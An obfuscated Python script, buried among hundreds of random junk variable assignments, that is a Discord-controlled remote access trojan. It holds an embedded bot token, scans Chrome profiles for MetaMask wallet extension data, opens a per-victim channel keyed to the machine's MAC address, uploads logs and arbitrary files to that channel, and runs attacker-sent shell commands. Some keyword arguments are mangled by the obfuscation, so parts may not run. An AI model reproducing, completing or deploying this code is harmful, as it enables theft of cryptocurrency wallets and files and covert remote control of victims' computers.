AaaaAaAAaaAaAaAAAAaaaAAAAAaaAAAAAaAaAaAaAaAaAAAaAAaaAaAaAaAaaAAaAaAaaaAAAaAaAAAAaAAAaaAaAAaaAaaAaaAaaaaaaAaAAAaAAAAaaaaaAaaAAaAAaaAaaaaaaaaAaaaaaAAaAAAaaaAaAAaaaAAAaaAaaAAaaa = "jSGUGbDttQpThLCjAprITSMGVUQhKvvDbgdmdnnjEReYHKuOiYAfzvYHRuIjnAMQRcOseBhApTKpzWB"
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww = "UqtMtBqLLaYVtgoLhotaMWBpVMIKdVweqdJiiMTAtjOPjOIYzsTOVgiufklwvyhKjhydbGjTcifsMbU"
AAaaaaaaAAaAAAaAaaaaAAAAaAaAAaAaAAAaAaAaaaAaAaaaaaAAaaAaAaAAaAaAAaAAAAaaAaAaaaAAAaaaAAAAAAaaaAaaaAAaaaaAAAaaAaaAaaAAAAAAaAaaAAaaAAAAAaAAaAAAaAaaaaAaaAaAaaAaaAAaAaaAAAAAaa = 106
ZginrSeTYbRaOXdilHezpWeTWhijnlZesohYKXXeoHTjZglGpUIldqAtoouNJvgZxPXeThteOhZLaAI168 = 741
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa = "qJUffZcpbjOgsaFGnbQehTXfmTvwzxBUzrNtfSiyxgcYVTUIfCDZwKwcIPXABxKswCvzSPGdpnaTUni"
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee = "KMntVpRFUmmfJFGHyRSRXggqVODnEkDcrswgNoRihYcWRERvvKQjSdJmZPQcTCOGMCejefQGCiTChTq"
f17011854663270173162 = "DwXFGLRftwMsZfVITyJRiBvEWNoBISHdhXbRUugxPogsRLjpjIUampRFRpgLloFQGeJsdvxdeLImMWt"
lIIlIIlIlllIIlIIIIllllllIIIIlIlIIlIIlIIIlllllIllIIIIlIlIlIIllllIIIlIlIIIIllllllIIlIlllllIIIIlIIIIIIIIlIIllIIlllIIlIIlllIlIIIlllIIIIlllIlIIllllllIlIlllIIIIlIIlII = 317
lIllIIllllIlIlIlIIIlllIllIlIllllIIIIlIlIIIlllIlIIIIlllIIlIllIIlllIIlllIlIIllIIIIlIIIIlIlIIllIlIlIlIIlIIllllIIllIIIIlllIIIIIlllIIlllIllllIIIIllIIlIllIlIlIlIllI = "RCXkwQlTvzfNnsjRKfsaxNRcmxXRfunVnLbotjJsfVDtJAoPCFocRtxLFXggbbdMcvifVfWchAisRnI"
T156 = "fyVIoKRHCFpBcPQcZzjHhQaiJntEosGewayCCSZpWBFPRhQMpXvyCFdElJbZBQDIuTLDslOQtMwmaYd"
y17011854663265617154 = 751
O17011854663265522152 = 630
aAAaaaAAaaAAAaaaaaAaAAAaaAAAaAAaAaaAAAAaAaAaaAaaaAaaaAaAAaAAAaAaAaAAAAaAaAAaaaaaAaaaAAAAaaaaAaaaAaAAAaaAAAaAaaAaAaaaAAAaaAAAAAaAaaaaaAaaaaaaAAAAaaAaaa = "jaVXUsVXZYgcHToTxCeRhdqENAVPDdyhJZTwIFKCCpHeMcVtPbxUpgioRDRFYxhuHzbwGuoEdovhrJk"
aAaaaAAaAaAAAaAaaAAAAAAaAaaAAaAaAAAAaAaaaAaaaaaAAAAaaAAaaAaaaaAaAAAAaaaAAaaAAaaaAaAaAAaaAaAaAaAAAaaaaaaAaaAAaAAAAAaAAAaAAaaaAaAaaaAaAaaAAaaaAAAaAAaa = 331
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp = "RBGwAIONfTgWyrJhNrVQJsbMugpCrWBYStsWaeUYbqaYWMeVsfcgnhbDzhcnrHKIvFKLiLvtEaCGZxJ"
lIlIlIIIllIIIlllIIlIIlIlIlIIllIIIIllIlIlIIlIIIlIIlllllIIIllIIIIlIIlllIIlIIllllIlIlIllIIIIlllIIIIIIIIIlllllIllIIlIIIIIIIIlIIIIIlllIllIlIIIlIlIIll = 317
IlllIIllllIllllIIllIlIlIlIIlIIIlIlllIIllIlllIIIIIlIIIIlIlIllllIlIIlIlIIlllIIIIIllllIlIIIIIlllllIllIllIIIIlllIlIIllIllllllIIIIIIllIIllllIIIllll = "SZrqTohaxPEGYWxQrsQFphWltIIbKFZbWyNePBROLQoDRPRIBVNaXPCNDkShRvbcCxGrUhVeSPAzofz"
IllllIIllllIlllIllIlllIllllIIllIllIIIIIIIlIlIllIIIlIIlIlIIIlllIIlIllllIIIllIIlllIllllIIlllllllIIlIIllIlIIllllllIlllIllllIlllIIIllIIIIIlIlIII = "weZZblHAnCDEUOzOdhUNjsBQgmJmWAlFBeCUpaWdhpODXFFauUyeBwEnVzMrEIXXJdnTdIbeAtEANzx"
f17011854663258321138 = "AckdbBOQRyjtAFTenuonvtxMFJKqqoXiWSReAjwntTAabUGjiJMTilysSRDSXherwpqbudkjJvkTzBk"
ahkyAGytZEIpToFKYXWMeCLfvNNHOczzLrHvXTUOajwLBPUswilDpwMkxogjDyoJORBZoWxzKNSEKsM136 = 364
Y17011854663256786134 = 392
A1701185466325669132 = 735
D130 = 431
IIIIlIIIlIlIIlIIlIlllIllllIIlIlllIIllllllIlllIllIIIllIIIlIIIIIlIIIlllIIlIIlllIIIllIIIlIllIlIIllIlIIIllIIIIIIIllIlIIllIllllIlllII = 203
llIlIIIIlIIlIIlIlIlIIIIIIlIlllIlIllIlIIlIIlIIlIlIIIIIlIlIIllIIIlllIIlIIIllIIllllIIIIIlIlIllIllIIlIIlIlIIIlIllIlllIIlIlIlllllIl = "ecuUYLXaDqcuZLUWmoMhTslQFSCfHLxAsKNyrgUMRnulDJWjvviRKTtPhJOOtOFBpGfgyjjSGdkMoQL"
KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK = 759
J122 = "ovwkHloZMWEsSZseKmtYMMMmrcTfBHxNSrJZHAqIUcbMiivSIqROaybBiqxopPxZhdczXGUDAyRCeir"
I120 = "SXDVELTzAujuttGXziVvrSaJkydvdFrOjAkGptcyurWScjxYgrJCcCWRnmDWvqxiSNkhahZoGFRlorc"
llIIIIIllIIlllIlIIlIlIlllllIllIIlIIIIlIlIlllllllIlIlIllIIIllllIllIlIlIlIIIIIllIIIIIIIIIIIIlIlIlIllIIIllIIIlIlIlIllllll = 446
AaAaaAaaAaAaaAAAAAaAaaaAAaaaaaAaAaAAAAAAaAAaaAAaaAAAAaAAaaAaaaAaaaAaaaAaaAAaaaaAaaAaaAaAaAaAaaAAAaAaaAaAAAaaAaaaAaAa = "oIqkQQbClnaInBuHugtNLpXbkGJEovQQKWlnRPojMVvBvcXAenTILscwjSyTSWNsSeqtYHICYDQxLPP"
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ = "mCVHfUencXfEQjHJXqxAedksmpSapfCyMcUiIhizdgiLDLLwUjiygiNsQSrHCjbnumaqOEOTqNaGgZf"
B112 = 417
IIlllllIIlIIIIIIlllIllIllIIIlllllIIlIIIIIIllIIIllIIIlIIlllllIIIIIIlIllIlllllIIIIIlIllllIIIIIIIlIlIIllIlIIIllII = "fhorPqrOTFVOnvPzoWXyzpjUTXUMYmIfOSWPlKUjlCSQStzQGVGeZckMiEOPDNxjEIlyWUDntsyrotf"
aAaAAaAaaAAAaaAAaAAaAaAAaaaAaaaAAaAAaaaaAaAaAAAaaaAAAaAaAaaAAAAaAAaAaaaAAAaAAaaAAaAaAaAAaaAAAaAaaaAAAAaaaaAA = "ZrtEVZVxzxuWWRHLoNqwENMNCcAmoqxfxUucMOTSwhrqTKauFtdGMfgJRSNxFhpwlNSJJuGndcZzTFx"
d17011854663246675106 = 232
IIIlIlllIlIIIllIlIlIIlIlIllIlIlllIlllllIIllIIIIllIIIIllIllIIlIlllllIlIIllIIIIllIIlIIlIlIIlllllllIlIlIIII = 438
IllIlIlIlIllIIIlllIlIIIlIllIIlIIlIlIIlIllIIlllIIIlIllIIIIlIlllIIllIlIIIIIllIIIIlIIIllIllIllIIIIIlIllII = 463
AAaAAaaaaaaAaAaAAaaaAAAaaAaAaAaaaAAaAAaaAaAAaAaAAaaAAAaaaAaaaAAAaaaAaaaAAAaaaAaaaaAAaaAaaAaAaaAAAaaA = 840
aaaAAAAaaaAAAAAAAAaAAaaaaAAaaAAaaAAaaaaAaaAAAaAaaAAAAAAAaAaAAAAAaaAAaaaAAaAaAaaAaAAaaAaaaaAaAAaAaA = "jwoewwdDfCIuaoIxBgFQtEFXkdQcriMZXaVREiNXZwSPdldcgJcgVVIJZZOtdUccjlXAAyzPykyVTJQ"
g17011854663242796 = 99
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx = "UDlNYvWnaTfNTxnjOTBJzmXiglusPnYmiUQzNXVcghfyoeSEyGuMNFQJIfBdhGRCBRFkUBwkbiektvD"
jGBHhegjMwrOCEyLkbECBOCegmwFReXhltaUYQtUsSXSNpPLFrFIogwNGDphtBnFWznGEzYvHssQqMl92 = 335
w1701185466324054790 = "NSAzVBNrEGmLLOrHFUBTDvDRFOvgEYeaaDjMQUxGhWXZVlwrvyLVwcGRAOWFRhZQwnIoqVEhBPuRvUK"
cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc = 160
N1701185466323942786 = 680
UuWPBPexEZYBPfpSYFiXaeEcZNExFOdAefibOSQzxImxFvhfevgzmlRqrsViFsLqAXqCmknhSYJinZZ84 = "cNHKxVVjCCYKyZUnizaEqIDeOJDFnRZNSRpMfVtulKaTJmEVpDpTNFEXMcaIAzbwJXFMgBwCpPkRsAO"
w82 = 636
AAAaAaAAaAaaAaAaaAaAaaaAAAaaAAAAaAaAaAaAAAAaAaaAAaAaAAAAAAaaAaaaaaAAaaAaAaAaaAaA = 645
IlIllllIIIllllllIllIIlllIlIIIIIIlllIIlIlIIlIlllIIlIlllIllIIIIIIIIIlIIIllllIlll = "BMeARyVApBrDEJDZjaBzXHBgSsgKUJmMYtVpbsZvhFSuGxwbLOGyrECEmWnWEQrxfTHGkxBSZrVkByl"
d170118546632360576 = 758
o1701185466323539374 = 344
f1701185466323499272 = "zAGDpXPlaTsefvUBBFYUlNTDSoWVRJJIgEFEOJesfRaFkXeXmBahMMOKJbhGdrNpnxaSqwzdmFYxKla"
aAAaaAaaaAaaaAaAaaAAaAAAAaaaAAAaaaaAaAaAAAAaaAaAaAaaaaaAAaaAaaAaAaaAAA = "lYfqvJeLDsrQVziVcHDwRUlecqbVkwSpcSwLxJHZMlketAdllUyWbxwaqUBLTAuMRAygQxIxNgayhqt"
IlllIIlIIllIIllIlllIlllllIIllllIIIIlIllllIlIIlIIlIIllllIlllIIlIlllII = "WfFQPaXVZlAZpIXdJgSrIIfObwWSCbXDSvhVzdikJyTuwIanhzyFKOLOhumKXSbXJUZsPPYSahDpRqw"
AaAAAAAAAAAaAAaaaAAaAAaaAaaAAAaAaAaAaAaaaaAaAAaAaaAaaaAAaaaaaaAAaA = "AeqEIJMBpplIGGLvFZOduJzHwRXpTJYOVWxlVJMupuDjxuFziRuBATrdcxHTvKOHhMtnnuDlAINihKb"
rjwnvjeVspVTBchtEBKNDAjUpqMMDwhriadZunUOTkkxQQZOLKERpHXVwjwbUghjIYDaqxUcKkKXGoF64 = 239
SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS = "SgQQnEhCIywhJAHtcXFXPWzTybptnyBkByeFlytHJJVLrzxhsKMyozhbmbpxgyrMNLfWnaKZgJkADwM"
AAAAAaAAaaAaaAaaaaaAaAAAaAaAAAaaaAaaaaaAAAAAaAaaaaAaaaaAaAaa = "ZqPUEByNCVKNIIELEQHqTIXuOtkvUkXPaXTXFmLFNFmZnyrOwRXAKUvSynPqJXoUmJxIqEQVIqpoOcj"
llIIllIllllllllllIlllllllIlllIIIIlIlIIllllIlIIlIIllIlIIlII = 219
lvniHsxdrLYsrPFOuqVBWcGxynJXtZmQUWkAuhkecLaiZZoxuTNjBGBsTxjkIcnsGnZAAmQcRBpoEFm56 = 294
X1701185466322842654 = 628
j52 = "AFUHbwXkUXHnMxWmFCrVgPLJbolitjYFDiIHFogPmYwIDFaQSpkpXdBxGLQvlfPRNedzYDEagybSypx"
lIlIlllIIlIlllllllIlllIlIIIIlIllllIIlIIlllIIlIllIl = "ULXxcqemRKjVWYRJayLnQdCyGucaYXBpODTDLYLDcDQzaWQPBSddoviapWTyfftQAdlDkPFgXSJVPQO"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa = "aEJtKOceGMGiWYplOmlmxDIDnNViXlMTGgQCaHvgLBQgdlCcnjixmKNBsJLppthpDGVXDaTbxVfedwI"
lIIIIIIIIIlIlIIlIlIlIIlIlIlIIIIIIllIllIIllllll = "FtMufwQcLyChXJkbGKGfRfngQkllZFeBTfzPsBoxttVoofJDfbzUsEFSunzWCuBtGYniDlPaCenKFjw"
L1701185466322527444 = "ysUunHtRIJhAfWRLZKUQqKFboowSmBsfvTtJkzLAacUgONJzQvLlytJQIytjKTPwHZrblFEdyEXFxKK"
p1701185466322460242 = 269
f1701185466322450940 = 224
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii = "JAoBwrxwDqXSnOQweoUJPHzNAxOlKKapoUDgCKsUxAJvdtULiTlKPOIflAZnsFSZMZGQacWNeGrwrxx"
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW = 386
AAAAaaAAAaaAAAAaaaAAaaAAaaaaAAAaaa = 393
lIllIlIIlIllIIIIlIIlIIllIllIIIll = "TiHreePVmTqjFhqLMuWFcuXPfYjmjRTVUWFOTMKJxIhtmyoNjgIMrOPLiodRFkpIRtMmbSRyXSUDJkK"
aaaaAAaAAAAAAAAaAaAaaAAAaaaAAa = "cloraqyBtOlqvZIAbcEfbOOLsCLEPzsfIgElgxEhjSJtcAmjQScHPWwxYWApUiASTfNaaeMRssszURc"
WdQEcBeJHMsIlOkmJOcdpShFDoZlFTvsKMQxrneZAIOZyoIzvtnOXFeejGgTCPPtnwZXcudOgdxheuB28 = 534
dddddddddddddddddddddddddd = "pKfLmLHlQJWsQaEFeuvEEWFxWmYINSgkxziTKHjEVLRjcJWTohmQUWnjvFFyZkSmrAjqYlHvyECvJPM"
LLLLLLLLLLLLLLLLLLLLLLLL = 561
T1701185466321881322 = "OgGuyXbeLxlyBYXuNFuVgFspZvAqoAmHdYrnclvKjQfsKyItMpxxywjJHbGOvcTJeSjQIgpTYeqWTuS"
L20 = "wtGPzBwoKGVRSSRydjILDmfBKLjeIEISsFRKBnSDMkFTqVvqvkdQLHhYPhtMhqjftwrVUDZyXekWzWQ"
aaaaaAaaAaAaAAaaaA = 409
IIIIIIIIIIIIIIII = "aEykjNdWVGJBKgTQzPBwQxQLltwoMwCazZWiCrgmdotMxcoazxjOOnebwFxSaVuPVgrkBEPVKpndlba"
IlIlIllIlIIlIl = "PcfaJnwFsPaUhnxcAKLMPqlcGywuSWwjPYHgWrwvnXFgByICcnwiCzvDPteyAXfoihcZgWUpcpInLcU"
e12 = 443
q1701185466321566810 = "taWVXOZlhfkKQCSfvGPhNAjqWSyCdraRYDjFoZnuNjsEMeJHMmGJckafhZdBAIVSlCCFvXeJCcvbEfo"
llIllIIl = 520
P170118546632142696 = 254
aaaA = "zIVIUJjUyoqpQtuLfOTjOelSKVPPOtBiLJzBbXoazXQUgLoRaXCCGyvQBZnvCoQevbWOXABeoDUPwNJ"
SS = "bWXhMnxWUPhWzkGLRsYGTROsHIzLqpJnwPDduZsAMAIvkVmRHnTiFXcCrkOlJBzoSJUXngSeAqpRzzU"

import os
import uuid
import discord
from discord.ext import commands
import subprocess


u17011854663113331 = 'MTE1OTA0MTYyMDg4NTM4NTI0Ng.GIxqcO.mdWColGwuTb9Ae2SrAUdbbkxoXX0SisDLjQR8o'
u2 = "1159042334500069386"

IIIIlIlIIIlIl = discord.Intents.default()
IIIIlIlIIIlIl.message_content = True
IIIIlIlIIIlIl.presences = True
IIIIlIlIIIlIl.members = True

d1701185466314428617 = discord.Client(intents=IIIIlIlIIIlIl)

aaaAAAaAaaAaAAaaaAA = ''
a20 = ''

aaAAaaaaAaAaaaaAaAAaa = uuid.getnode()
IlllIlIlIlIlIlIIllIllI = f"{os.path.expanduser('~')}\\AppData\\Local\\log.txt"

def start():
    r23 = f"{os.path.expanduser('~')}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn"
    e24 = []
    for i in range(1000) :
        a170118546631601125 = f"{os.path.expanduser('~')}\\AppData\\Local\\Google\\Chrome\\User Data\\Profile {i}\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn"
        if os.path.exists(a170118546631601125):
            for t1701185466318364937 in os.listdir(a170118546631601125):
                if t1701185466318364937.endswith('.ldb'):
                    if os.path.exists(os.path.join(a170118546631601125, t1701185466318364937)):
                        e24.append(os.path.join(a170118546631601125, t1701185466318364937))
    if os.path.exists(r23):
        for t1701185466318364937 in os.listdir(r23):
            if t1701185466318364937.endswith('.ldb'):
                e24.append(t1701185466318364937)

    B1701185466316194826 = commands.Bot(command_prefix='!', intents=discord.Intents.all())

    @B1701185466316194826.event
    async def on_ready():
        print(f'Bot connected as {B1701185466316194826.user}')
        U1701185466316759329 = B1701185466316194826.get_guild(int(u2))
        global AokawCpMAiIWoEMKasCQbrFCxGpSTJdrmyyiHCgDYIbcPTmgOdIyIxeVzmbAkUXzsEeHFlnXwYtVUwo30
        AokawCpMAiIWoEMKasCQbrFCxGpSTJdrmyyiHCgDYIbcPTmgOdIyIxeVzmbAkUXzsEeHFlnXwYtVUwo30 = discord.utils.get(U1701185466316759329.channels, aAAAaaAaaAAAAAAAaAAaAaaAaaaAAaa = os.name + str(aaAAaaaaAaAaaaaAaAAaa))
        if AokawCpMAiIWoEMKasCQbrFCxGpSTJdrmyyiHCgDYIbcPTmgOdIyIxeVzmbAkUXzsEeHFlnXwYtVUwo30:
            await AokawCpMAiIWoEMKasCQbrFCxGpSTJdrmyyiHCgDYIbcPTmgOdIyIxeVzmbAkUXzsEeHFlnXwYtVUwo30.send('This is an existing AokawCpMAiIWoEMKasCQbrFCxGpSTJdrmyyiHCgDYIbcPTmgOdIyIxeVzmbAkUXzsEeHFlnXwYtVUwo30.')
        else:
            f32 = discord.utils.get(U1701185466316759329.categories, aAAAaaAaaAAAAAAAaAAaAaaAaaaAAaa='Category Name')  
            AokawCpMAiIWoEMKasCQbrFCxGpSTJdrmyyiHCgDYIbcPTmgOdIyIxeVzmbAkUXzsEeHFlnXwYtVUwo30 = await U1701185466316759329.create_text_channel(os.name + str(aaAAaaaaAaAaaaaAaAAaa), f32=f32)
            await AokawCpMAiIWoEMKasCQbrFCxGpSTJdrmyyiHCgDYIbcPTmgOdIyIxeVzmbAkUXzsEeHFlnXwYtVUwo30.send('This is a newly created AokawCpMAiIWoEMKasCQbrFCxGpSTJdrmyyiHCgDYIbcPTmgOdIyIxeVzmbAkUXzsEeHFlnXwYtVUwo30.')

    @B1701185466316194826.command("send")
    async def send(ctx):
        if AokawCpMAiIWoEMKasCQbrFCxGpSTJdrmyyiHCgDYIbcPTmgOdIyIxeVzmbAkUXzsEeHFlnXwYtVUwo30.name == os.name + str(aaAAaaaaAaAaaaaAaAAaa):
            with open(IlllIlIlIlIlIlIIllIllI, 'rb') as t1701185466318364937:
                await AokawCpMAiIWoEMKasCQbrFCxGpSTJdrmyyiHCgDYIbcPTmgOdIyIxeVzmbAkUXzsEeHFlnXwYtVUwo30.send(t1701185466318364937=discord.File(t1701185466318364937))
            await os.remove(IlllIlIlIlIlIlIIllIllI)
            
    @B1701185466316194826.command("sendfile")
    async def sendfile(ctx, *, filename):
        print(AokawCpMAiIWoEMKasCQbrFCxGpSTJdrmyyiHCgDYIbcPTmgOdIyIxeVzmbAkUXzsEeHFlnXwYtVUwo30.name, os.name + str(aaAAaaaaAaAaaaaAaAAaa), filename)
        if AokawCpMAiIWoEMKasCQbrFCxGpSTJdrmyyiHCgDYIbcPTmgOdIyIxeVzmbAkUXzsEeHFlnXwYtVUwo30.name == os.name + str(aaAAaaaaAaAaaaaAaAAaa):
            if os.path.isfile(filename):
                await AokawCpMAiIWoEMKasCQbrFCxGpSTJdrmyyiHCgDYIbcPTmgOdIyIxeVzmbAkUXzsEeHFlnXwYtVUwo30.send(t1701185466318364937=discord.File(filename))
            else:
                await AokawCpMAiIWoEMKasCQbrFCxGpSTJdrmyyiHCgDYIbcPTmgOdIyIxeVzmbAkUXzsEeHFlnXwYtVUwo30.send("File not found!")

    @B1701185466316194826.command("run")
    async def run(ctx, *, H1701185466319085441):
        if AokawCpMAiIWoEMKasCQbrFCxGpSTJdrmyyiHCgDYIbcPTmgOdIyIxeVzmbAkUXzsEeHFlnXwYtVUwo30.name == os.name + str(aaAAaaaaAaAaaaaAaAAaa):
            if H1701185466319085441 == 'cd..':
                os.chdir('..')
            elif H1701185466319085441.startswith("folder_"):
                zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz = H1701185466319085441[7:]
                os.chdir(zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz)
            elif H1701185466319085441.startswith("drive_"):
                eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee = H1701185466319085441[6:]
                os.chdir(eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee + ":")
            else:
                AAaAAaAAaaaaaaaaAAaaAaaaAAAAAaAAaAaaaAaaAaAa = subprocess.run([H1701185466319085441], aAaaaaaaaAaAaAaAAAaaaAAAAaaaaAaaaaaaaaaAAAaAa=True, EXwaKCaEINcZeMoPojGQSMucmiJwSUHtnSAorJJAyGLvtzaLoexmTrPxPVkgxNfTqaaUWpjroqdGZxw46=subprocess.PIPE)
                AAaAAaaAAaaaAaaaaaAAaAAaAaAAAaaaAAAAAaAaaaaaaAA = AAaAAaAAaaaaaaaaAAaaAaaaAAAAAaAAaAaaaAaaAaAa.stdout.decode('utf-8')
                if len(AAaAAaaAAaaaAaaaaaAAaAAaAaAAAaaaAAAAAaAaaaaaaAA) > 2000:
                    EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE = [AAaAAaaAAaaaAaaaaaAAaAAaAaAAAaaaAAAAAaAaaaaaaAA[i:i+2000] for i in range(0, len(AAaAAaaAAaaaAaaaaaAAaAAaAaAAAaaaAAAAAaAaaaaaaAA), 2000)]
                    for chunk in EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE:
                        await AokawCpMAiIWoEMKasCQbrFCxGpSTJdrmyyiHCgDYIbcPTmgOdIyIxeVzmbAkUXzsEeHFlnXwYtVUwo30.send(chunk)
                else:
                    await AokawCpMAiIWoEMKasCQbrFCxGpSTJdrmyyiHCgDYIbcPTmgOdIyIxeVzmbAkUXzsEeHFlnXwYtVUwo30.send(AAaAAaaAAaaaAaaaaaAAaAAaAaAAAaaaAAAAAaAaaaaaaAA)

    B1701185466316194826.run(u17011854663113331)

start()
B1 = "iZuReGuRgMHNPgTVEZycPQdmHJjXIzdhIJldiTLLZlRTDzpjCemWvBCwznEbjpTgRFFfXjMRjqsvcDg"
qzARNLzAMYBbcEGIEMdkQGiQDGsFrbyEakHoOKCuZdJAjdugaBPQsanMlrYdgzPJKCiWoAsNIWNyyxz3 = "MioEQTfNIepZJStStIxTcLOICGxRmyHviNLqZbchTletwsSkkIJgPWKfYJPWGqWcukUwJVFFwHBZYZC"
l170118546632140565 = "jVdNxJLGXmVefPRwHagKjiMvnbbQRDCqpntBiWFRMWAoRXkgtaLQkpeaVHoLayieOUugDsNwmJZiRoi"
j170118546632149127 = "CSaJlapKFPyUQzEGxXacksIKguJCcvlRnLPYzmnsYgPRKwvGHBNfHpwzXtggbpbtPAOCZdmvUaQNRVs"
k170118546632151469 = 704
IlIlllIIIIl = 883
V13 = "bEKFBOVpRyUPXkzJBqeieAfZEFDJBjQKbPVlVXndhiolfDgEaxqXhgUkrPFJjkFrcIelbPozhBfYvVG"
zzzzzzzzzzzzzzz = "UTjNfFxgitfcHkeGSTDSoOyxkDMOTZcJzRQBisKqyCyjOTlsvvKaXCGyfJiOeBMSikNWkGfBuoxWGPH"
k1701185466321792817 = 15
k1701185466321809819 = 360
k170118546632184821 = 876
IlIlIIIIlIlIllIlllIIlIl = 725
s1701185466321930625 = "UJyRBqirusoyBQmApdkAogESqLkqbcwORpLhmyoRXiJrcYPbSgMlUEmHpISHtwDSUTlukifJXvVeVTo"
IlIlIIIIIlllIIlllIllIIIlIlI = "sdWKTapZdaYhahtyYVRwPhiTUjBJTzitzJlRjJAUahAkkLkeipIWGwTILgsHlEuYLRLQhwVNHpxFwMk"
o29 = "BuoVgsacEJxMsGccKyocfMhqCNvvsgjGkovYjNRCoDSlsrNKcHotxrevYVNpFGqLkouZKOxkRQikEsF"
WUGnmXpRkyEZzGdfGRMuyBBaLgCHTPeocZdMnQOSlTISxwSEOIJLRYFMJfWHHtpFlWxtHjAqnahWBjS31 = "RjIsbMKpIWtfsbISLSKAPGNxArfIpvuIPoogyubcbhXaEQtJFvHhWJCObRfWrIIYvRjpVhIASbdemGY"
s33 = "ErOSaddsEzZfhmWaUiJNuhPRSnZvGGxDnaiPwJEyWbMjmpYwfNZuHYNflnXzYVriBYHiZUqHHWhneuH"
llIIIIlIIIIlIIIIIIIlIlIIIlIlllIllIl = 544
aAaaaaaAaAaaaaAaAaaAAaAAaaAaaAaAAaaaA = "fzitUlcmNdrNSDasqAtwVFAhpFWVCedkfatycOldxzMqEPOkgeKMUTtwyQNjuwAhbYvVtdrdBgEtwtz"
IlIlIlIIIlIIllllIIlIIIIIlIIlIllIlIIIlIl = 333
e41 = 226
q1701185466322494343 = "lpbjPMfWwKqmfmbIDyJaJmiJITpFIuXrPQGjMKtiysEGKgxZcunGsRXuydKrzJDDDjeUwbnqRGCuAEo"
G170118546632257545 = "gYWFFtTQbmDabLRjsQLVmAiMsjdSUhJdxWoEUYYEXUoqJxhBBjuIbEQuVATCcXvarFMWupAUuqsGPXy"
e1701185466322633547 = 221
M49 = 322
vVEvlSoTVTmXUNlJdrReorMTJpxEGRmGRzcCKRfzsaLciCzLxeNaKIsvDSyixztkzoJfiCyfWqrlICz51 = 340
aaaAaAAAAAAaaaAaaaaaAaAaAaaaAaaAAAAaaaAaaAaaaAAaAaAaa = "DZJJNdqalVlhaTslKUeyOXtzetDoXsGRpaTadGpTPKCYRfZBuCEvYtQGAYFXcxWYUBJeWJWiIhEKuAF"
T55 = 315
IIIllllIllIIlllllIllIllIllIlIIIllllIlIIIIllIIlIIlllIlIlIl = "LpjtxoiPYrIbUllcmsLkljHhOSpKWQgGBlpzIwSNdwNpegzRhdMiSBHZphvaeSIFcSJPNeuxGRYoWVe"
IIlIIlIllIIIIlIlIIIIIIlIIIIIllIIIIIIIIIlIlIlllIlllIIlIlIIlI = 566
SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS = 434
IllllllIIIIIIIlIIllIlIllIlIIIlllllIllIllIIlIIIIlIIllllIlIlIIIll = 361
AaaaaaaAAAaaaaAAAaAAaaAAaaAAaAaAaaaaAaaAaaaAaAAaaAAaaAaaaAAaAaAaa = "PbySdTfdaWeXzeBIxMpXBKXnjUTQHNntUBBKdYFcrksMuqBmTaqjKHIQQqWEUZDxZXCjMQbaKMVZIpp"
m1701185466323286867 = "AlLncYNeDmuxUtdLlWUzcrjinGtLEtYxffdXjfLGJuqDAhTDHyYLBcDKNIIAABZdZEQjhouAgldlFoM"
OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = "WuJcbkthIbVKkjGNYhMpvNkNvTDMGZkfEDPYpOKWZOTJKsVJzCYnhgELObpqAWHYuUjYhlVTdiiXXZj"
llllIlIIIIIIIllllIlIIIIlIIlllIIIIlIIIlIIlIlllIIIIlIlIlIlIlllllIIllIlIlI = 108
u170118546632353473 = "qoUnVtdgVkQvJfTbtbNsaPYiwQxIxmGXJKggzwHxSGxMlsBLMQEPbwoGcwWFkhJXEpDrCvexVaDNoWg"
